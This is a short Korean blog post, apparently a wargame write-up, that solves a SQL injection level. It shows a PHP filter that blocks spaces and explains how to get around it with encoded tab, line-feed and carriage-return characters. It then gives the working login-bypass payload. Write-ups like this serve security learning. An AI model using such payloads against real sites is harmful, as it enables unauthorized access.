?pw=1 or id=%27admin%27
No whitespace가 뜨며 해결되지 않는다.
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");
preg_match 함수를 살펴보면
pw에 띄어쓰기가 사용 불가능하고,
띄어쓰기의 URL 인코딩 값인 %20 역시 사용 불가능하다.
빈칸을 우회하는 방법은 은 여러 가지가 있다고 한다.
빈칸을 우회하는 방법은
Tab : %09
Line Feed(\n) : %0a
Carrage Return(\r) : %0d
등등.
따라서 답은 ?pw=%27%09or%09id=%27admin
'Web > LOS' 카테고리의 다른 글
[LOS] 문제 7. orge (0) | 2018.10.26 |
---|---|
[LOS] 문제 6. darkelf, or과 and 우회 방법 (0) | 2018.10.26 |
[LOS] 문제 4. orc, 함수 이용하여 패스워드 알아내기 (0) | 2018.10.26 |
[LOS] 문제 3. goblin, 따옴표 문자 필터링 우회 (1) | 2018.10.26 |
[LOS] 문제 2. cobolt, 주석 URL 인코딩 (0) | 2018.10.26 |